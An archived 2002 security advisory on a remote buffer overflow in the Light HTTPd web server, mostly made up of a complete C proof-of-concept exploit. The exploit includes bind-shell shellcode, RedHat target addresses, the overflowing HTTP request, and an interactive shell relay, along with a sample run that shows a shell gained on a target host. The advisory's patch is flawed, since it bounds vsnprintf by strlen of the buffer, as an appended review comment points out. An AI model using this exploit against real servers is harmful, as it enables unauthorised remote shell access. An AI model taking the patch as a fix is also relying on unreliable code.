Remote Buffer Overflow vulnerability in Light HTTPd

2002-11-12T00:00:00
ID SECURITYVULNS:DOC:3745
Type securityvulns
Reporter Securityvulns
Modified 2002-11-12T00:00:00

Description

    ========================================
    INetCop Security Advisory #2002-0x82-002
    ========================================
  • Title: Remote Buffer Overflow vulnerability in Light HTTPd.

0x01. Description

Lhttpd is a web server derived from ghttpd, improved to be more convenient and robust, and offering several functions. This web server has a vulnerability that lets a remote attacker obtain a shell easily. It closely resembles the earlier ghttpd vulnerability.

0x02. Vulnerable Packages

Vendor site: http://lhttpd.sourceforge.net/

lhttpdwin0.1 -lhttpd0.1-win.zip +Microsoft Windows

lhttpd-0.1 -lhttpd-0.1.tar.gz +AIX +BSD +GNU Hurd +HP-UX +IRIX +Linux +SCO +SunOS/Solaris +Other

0x03. Exploit

This is proof-of-concept exploit code. Through a remote attack it obtains the privileges of the 'nobody' user.

=== 0x82-Remote.lhttpdxpl.c ===

/* Proof of Concept LIGHT HTTPd Remote exploit by Xpl017Elz __ Testing exploit: bash$ ./0x82-Remote.lhttpdxpl -h 61.37.xx.xx -t 3 Proof of Concept LIGHT HTTPd Remote exploit by Xpl017Elz
Try `./0x82-Remote.lhttpdxpl -?' for more information. [1] Make shellcode. [2] Send exploit (bindshell) code. [3] Waiting, executes the shell ! [4] Trying 61.37.xx.xx:36864 ... [5] Connected to 61.37.xx.xx:36864 ! [*] It's shell ! :-) Linux testsub 2.4.2-3 #1 Sun Jun 24 01:31:37 KST 2001 i686 unknown uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys), 4(adm),6(disk),10(wheel) exit bash$ -- exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. My World: http://x82.i21c.net Special Greets: INetCop team. */

include <stdio.h>

include <unistd.h>

include <getopt.h>

include <netdb.h>

include <netinet/in.h>

define HOST "localhost"

define PORT 3000

/*
 * One target profile. main() copies the three numeric fields out of the
 * selected plat[] entry; usage() prints num and os for every entry until
 * it meets the num == 4 terminator.
 */
struct os {
    int num;                /* position in plat[]; 4 marks the terminator  */
    char *os;               /* description shown by usage(); NULL on the terminator */
    int offset;             /* length of the '^' prefix main() builds into offbuf */
    unsigned long shaddr;   /* address constant main() repeats after the payload */
    int atlen;              /* total length of the payload main() assembles */
};

/*
 * Target table selected by the -t option (main() accepts 0..3 and reads
 * plat[type]). The final entry, num == 4 with a NULL name, terminates
 * the list for the `plat[x].num < 4` loop in usage().
 */
struct os plat[] = { /* only test */ {0,"RedHat Linux 6.x localhost lhttpd",1,0xbfffb744,160}, {1,"RedHat Linux 6.x remote lhttpd",0,0xbfffb608,150}, {2,"RedHat Linux 7.x localhost lhttpd",3,0xbfffb650,150}, {3,"RedHat Linux 7.x remote lhttpd",2,0xbfffb650,160}, {4,NULL,0,0} };

int setsock(char hostname,int port); void getshell(int sock); void usage(char args); void banrl(char args); int main(int argc,char argv[]) { int sockfd1; int sockfd2; int ax82,bx82,cx82,dx82; int type=0; int port=PORT; int atlen=plat[type].atlen; int off=plat[type].offset; char offbuf[10]; char hostname[0x82]=HOST;

char ptbind[] = /* BIND SHELL ON PORT TCP/36864 */
    //------------------- main: -------------------//
    &quot;&#92;xeb&#92;x72&quot;                        /* jmp callz */
    //------------------- start: ------------------//
    &quot;&#92;x5e&quot;                            /* popl &#37;esi */
    //------------------ socket&#40;&#41; -----------------//
    &quot;&#92;x29&#92;xc0&quot;                  /* subl &#37;eax, &#37;eax */
    &quot;&#92;x89&#92;x46&#92;x10&quot;        /* movl &#37;eax, 0x10&#40;&#37;esi&#41; */
    &quot;&#92;x40&quot;                            /* incl &#37;eax */
    &quot;&#92;x89&#92;xc3&quot;                  /* movl &#37;eax, &#37;ebx */
    &quot;&#92;x89&#92;x46&#92;x0c&quot;        /* movl &#37;eax, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x40&quot;                            /* incl &#37;eax */
    &quot;&#92;x89&#92;x46&#92;x08&quot;        /* movl &#37;eax, 0x08&#40;&#37;esi&#41; */
    &quot;&#92;x8d&#92;x4e&#92;x08&quot;        /* leal 0x08&#40;&#37;esi&#41;, &#37;ecx */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------- bind&#40;&#41; ------------------//
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;xc6&#92;x46&#92;x10&#92;x10&quot;   /* movb $0x10, 0x10&#40;&#37;esi&#41; */
    &quot;&#92;x66&#92;x89&#92;x5e&#92;x14&quot;     /* movw &#37;bx, 0x14&#40;&#37;esi&#41; */
    &quot;&#92;x88&#92;x46&#92;x08&quot;         /* movb &#37;al, 0x08&#40;&#37;esi&#41; */
    &quot;&#92;x29&#92;xc0&quot;                  /* subl &#37;eax, &#37;eax */
    &quot;&#92;x89&#92;xc2&quot;                  /* movl &#37;eax, &#37;edx */
    &quot;&#92;x89&#92;x46&#92;x18&quot;        /* movl &#37;eax, 0x18&#40;&#37;esi&#41; */
    &quot;&#92;xb0&#92;x90&quot;                  /* movb $0x90, &#37;al */
    &quot;&#92;x66&#92;x89&#92;x46&#92;x16&quot;     /* movw &#37;ax, 0x16&#40;&#37;esi&#41; */
    &quot;&#92;x8d&#92;x4e&#92;x14&quot;        /* leal 0x14&#40;&#37;esi&#41;, &#37;ecx */
    &quot;&#92;x89&#92;x4e&#92;x0c&quot;        /* movl &#37;ecx, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x8d&#92;x4e&#92;x08&quot;        /* leal 0x08&#40;&#37;esi&#41;, &#37;ecx */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------ listen&#40;&#41; -----------------//
    &quot;&#92;x89&#92;x5e&#92;x0c&quot;        /* movl &#37;ebx, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------ accept&#40;&#41; -----------------//
    &quot;&#92;x89&#92;x56&#92;x0c&quot;        /* movl &#37;edx, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x89&#92;x56&#92;x10&quot;        /* movl &#37;edx, 0x10&#40;&#37;esi&#41; */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //---- dup2&#40;s, 0&#41;, dup2&#40;s, 1&#41;, dup2&#40;s, 2&#41; -----//
    &quot;&#92;x86&#92;xc3&quot;                   /* xchgb &#37;al, &#37;bl */
    &quot;&#92;xb0&#92;x3f&quot;                  /* movb $0x3f, &#37;al */
    &quot;&#92;x29&#92;xc9&quot;                  /* subl &#37;ecx, &#37;ecx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    &quot;&#92;xb0&#92;x3f&quot;                  /* movb $0x3f, &#37;al */
    &quot;&#92;x41&quot;                            /* incl &#37;ecx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    &quot;&#92;xb0&#92;x3f&quot;                  /* movb $0x3f, &#37;al */
    &quot;&#92;x41&quot;                            /* incl &#37;ecx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------ execve&#40;&#41; -----------------//
    &quot;&#92;x88&#92;x56&#92;x07&quot;         /* movb &#37;dl, 0x07&#40;&#37;esi&#41; */
    &quot;&#92;x89&#92;x76&#92;x0c&quot;        /* movl &#37;esi, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x87&#92;xf3&quot;                 /* xchgl &#37;esi, &#37;ebx */
    &quot;&#92;x8d&#92;x4b&#92;x0c&quot;        /* leal 0x0c&#40;&#37;ebx&#41;, &#37;ecx */
    &quot;&#92;xb0&#92;x0b&quot;                  /* movb $0x0b, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------- callz: ------------------//
    &quot;&#92;xe8&#92;x89&#92;xff&#92;xff&#92;xff&quot;           /* call start */
    &quot;/bin/sh&quot;; /* 128byte */

char atbuf[512];
char sendnrecv[1024];
unsigned long shcode=plat[type].shaddr;
ax82=bx82=cx82=dx82=0;

memset&#40;offbuf,0x00,10&#41;;
memset&#40;atbuf,0x00,512&#41;;
memset&#40;sendnrecv,0x00,1024&#41;;

&#40;void&#41;banrl&#40;argv[0]&#41;;

while&#40;&#40;dx82=getopt&#40;argc,argv,&quot;S:s:O:o:H:h:P:p:T:t:&quot;&#41;&#41;!=EOF&#41;
{
    switch&#40;dx82&#41;
    {
        case &#39;S&#39;:
        case &#39;s&#39;:
            shcode=strtoul&#40;optarg,NULL,0&#41;;
            break;

        case &#39;O&#39;:
        case &#39;o&#39;:
            off=atoi&#40;optarg&#41;;
            break;

        case &#39;H&#39;:
        case &#39;h&#39;:
            strncpy&#40;hostname,optarg,0x82&#41;;
            break;

        case &#39;P&#39;:
        case &#39;p&#39;:
            port=atoi&#40;optarg&#41;;
            break;

        case &#39;T&#39;:
        case &#39;t&#39;:
            type=atoi&#40;optarg&#41;;

            if&#40;type&lt;0 || type&gt;3&#41;
                usage&#40;argv[0]&#41;;

            off=plat[type].offset;
            shcode=plat[type].shaddr;
            atlen=plat[type].atlen;
            break;

        case &#39;?&#39;:
            usage&#40;argv[0]&#41;;
            break;
    }
}

while&#40;off&#41;
{
    off--;
    offbuf[off]=&#39;^&#39;;
}

fprintf&#40;stdout,&quot; [1] Make shellcode.&#92;n&quot;&#41;;
for&#40;ax82=0;ax82&lt;atlen-strlen&#40;ptbind&#41;;ax82++&#41;
    atbuf[ax82] = 0x90;

for&#40;bx82=0;bx82&lt;strlen&#40;ptbind&#41;;bx82++&#41;
    atbuf[ax82++]=ptbind[bx82];

for&#40;cx82=ax82;cx82&lt;ax82+0x32;cx82+=4&#41;
    *&#40;long *&#41;&amp;atbuf[cx82]=shcode;

snprintf&#40;sendnrecv,1024,&quot;GET /&#37;s&#37;s HTTP/1.0&#92;r&#92;n&#92;n&quot;,offbuf,atbuf&#41;;

fprintf&#40;stdout,&quot; [2] Send exploit &#40;bindshell&#41; code.&#92;n&quot;&#41;;
sockfd1=setsock&#40;hostname,port&#41;;
send&#40;sockfd1,sendnrecv,strlen&#40;sendnrecv&#41;,0&#41;;

fprintf&#40;stdout,&quot; [3] Waiting, executes the shell !&#92;n&quot;&#41;;
sleep&#40;3&#41;;

fprintf&#40;stdout,&quot; [4] Trying &#37;s:36864 ...&#92;n&quot;,hostname&#41;;
sockfd2=setsock&#40;hostname,36864&#41;;
fprintf&#40;stdout,&quot; [5] Connected to &#37;s:36864 !&#92;n&#92;n&quot;,hostname&#41;;
getshell&#40;sockfd2&#41;;

}

/*
 * setsock - resolve `hostname` and open a TCP connection to it on `port`.
 *
 * Returns the connected socket descriptor. Every failure path
 * (gethostbyname(), socket(), connect()) prints a diagnostic and calls
 * exit(-1), so callers never receive an error value and get no chance
 * to clean up.
 *
 * NOTE(review): this listing lost its '*' characters in rendering; the
 * parameter and the hostent local presumably read `char *hostname` and
 * `struct hostent *sxp` in the original source.
 */
int setsock(char hostname,int port) { int sock; struct hostent sxp; struct sockaddr_in sxp_addr;

/* Name lookup via the legacy gethostbyname() API; only the first
 * returned address (h_addr) is used below. */
if&#40;&#40;sxp=gethostbyname&#40;hostname&#41;&#41;==NULL&#41;
{
    herror&#40;&quot;gethostbyname&#40;&#41; error&quot;&#41;;
    exit&#40;-1&#41;;
}
if&#40;&#40;sock=socket&#40;AF_INET,SOCK_STREAM,0&#41;&#41;==-1&#41;
{
    perror&#40;&quot;socket&#40;&#41; error&quot;&#41;;
    exit&#40;-1&#41;;
}

/* IPv4 endpoint: port converted to network byte order, address copied
 * from the first hostent entry, padding field zeroed. */
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons&#40;port&#41;;
sxp_addr.sin_addr=*&#40;&#40;struct in_addr*&#41;sxp-&gt;h_addr&#41;;
bzero&#40;&amp;&#40;sxp_addr.sin_zero&#41;,8&#41;;

/* The length passed is sizeof(struct sockaddr) rather than sizeof sxp_addr. */
if&#40;connect&#40;sock,&#40;struct sockaddr *&#41;&amp;sxp_addr,sizeof&#40;struct sockaddr&#41;&#41;==-1&#41;
{
    perror&#40;&quot;connect&#40;&#41; error&quot;&#41;;
    exit&#40;-1&#41;;
}

return&#40;sock&#41;;

}

/*
 * getshell - interactive relay between the connected `sock` and this
 * process's stdin/stdout.
 *
 * Sends the fixed command string "uname -a;id\n" once, then loops on
 * select(): bytes arriving on `sock` are printed to stdout, bytes read
 * from stdin are forwarded to `sock`. The loop ends only when read() on
 * `sock` returns <= 0, which terminates the whole process with exit(0);
 * the trailing `return;` is therefore unreachable.
 *
 * NOTE(review): readbuf holds 1024 bytes and both read() calls may fill
 * all 1024, after which `readbuf[died]=0` writes one byte past the end
 * of the array. The return values of select() and write() are not
 * checked.
 */
void getshell(int sock) { int died; char *command="uname -a;id\n"; char readbuf[1024]; fd_set rset;

memset&#40;readbuf,0x00,1024&#41;;

fprintf&#40;stdout,&quot; [*] It&#39;s shell ! :-&#41;&#92;n&#92;n&quot;&#41;;
send&#40;sock,command,strlen&#40;command&#41;,0&#41;;

/* Rebuild the read set on every iteration; select() modifies it in place. */
for&#40;;;&#41;
{
    FD_ZERO&#40;&amp;rset&#41;;
    FD_SET&#40;sock,&amp;rset&#41;;
    FD_SET&#40;STDIN_FILENO,&amp;rset&#41;;
    select&#40;sock+1,&amp;rset,NULL,NULL,NULL&#41;;

    /* Peer data: a closed or failed socket ends the process here. */
    if&#40;FD_ISSET&#40;sock,&amp;rset&#41;&#41;
    {
        died=read&#40;sock,readbuf,1024&#41;;
        if&#40;died&lt;=0&#41;
        {
            exit&#40;0&#41;;
        }
        readbuf[died]=0;
        printf&#40;&quot;&#37;s&quot;,readbuf&#41;;
    }
    /* Local input: forwarded verbatim; a failed or empty read is ignored. */
    if&#40;FD_ISSET&#40;STDIN_FILENO,&amp;rset&#41;&#41;
    {
        died=read&#40;STDIN_FILENO,readbuf,1024&#41;;
        if&#40;died&gt;0&#41;
        {
            readbuf[died]=0;
            write&#40;sock,readbuf,died&#41;;
        }
    }
}
return;

}

/*
 * Print the option summary (stderr) and the target table (stdout), then
 * leave the process with exit(0). `args` is argv[0] and is echoed as the
 * program name in the usage and example lines. Never returns.
 */
void usage(char *args)
{
    FILE *err = stderr;
    FILE *out = stdout;

    fprintf(err, "\n Default Usage: %s -[option] [arguments]\n\n", args);
    fprintf(err, "\t -h [hostname] - target host\n");
    fprintf(err, "\t -p [port] - port number\n");
    fprintf(err, "\t -s [addr] - &shellcode addr\n");
    fprintf(err, "\t -o [offset] - offset\n");
    fprintf(err, "\t -t [type] - type number\n\n");
    fprintf(err, " Example: %s -h localhost -p 3000 -t 1\n\n", args);

    fprintf(out, "\t * Select target type: \n\n");
    /* Walk plat[] up to the num == 4 terminator entry. */
    for (const struct os *entry = plat; entry->num < 4; entry++) {
        fprintf(out, "\t %d. %s\n", entry->num, entry->os);
    }
    fprintf(out, "\n Happy Exploit !\n\n");

    exit(0);
}

/*
 * Print the program banner to stdout followed by a hint that `-?` shows
 * the full usage. `args` is argv[0], used as the program name in the hint.
 */
void banrl(char *args)
{
    /* The first two strings contain no conversion specifiers, so plain
     * fputs() produces exactly the same bytes as the formatted write. */
    fputs("\n Proof of Concept LIGHT HTTPd Remote exploit", stdout);
    fputs("\n by Xpl017Elz\n\n", stdout);
    printf(" Try `%s -?' for more information.\n\n", args);
}

=== eof ===

0x04. Patch

=== util.patch ===

--- util.c Mon Dec 24 09:43:29 2001
+++ util.c.patch Thu Oct 17 19:02:00 2002
@@ -220,7 +220,7 @@ va_list ap;

    va_start&#40;ap, format&#41;;           // format it all into temp
  • vsprintf(temp, format, ap);
  • vsnprintf(temp, strlen(temp), format, ap); va_end(ap);
    time &#40;&amp;t&#41;;
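Review bot: The replacement line `vsnprintf(temp, strlen(temp), format, ap);` bounds the write by the current string length of `temp`, not by the buffer's capacity, so the overflow this patch is meant to close is not closed: if `temp` is uninitialised the bound is whatever garbage happens to be there, and if it holds a short or empty string the formatted output is truncated to that length instead of to the buffer size. If `temp` is a fixed-size array in this function the bound should be its size, `vsnprintf(temp, sizeof temp, format, ap);`; if it is a pointer, the allocated length has to be passed in explicitly. The return value of vsnprintf() should also be compared against that size so truncation is detected rather than silently logged. The enclosing function, including the declaration of `temp`, starts outside the hunk, so this is inferred from the visible lines.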
    

=== eof ===

P.S.: Sorry for my poor English.

-- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net

GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y

-- Get your free email from http://www.hackermail.com

Powered by Outblaze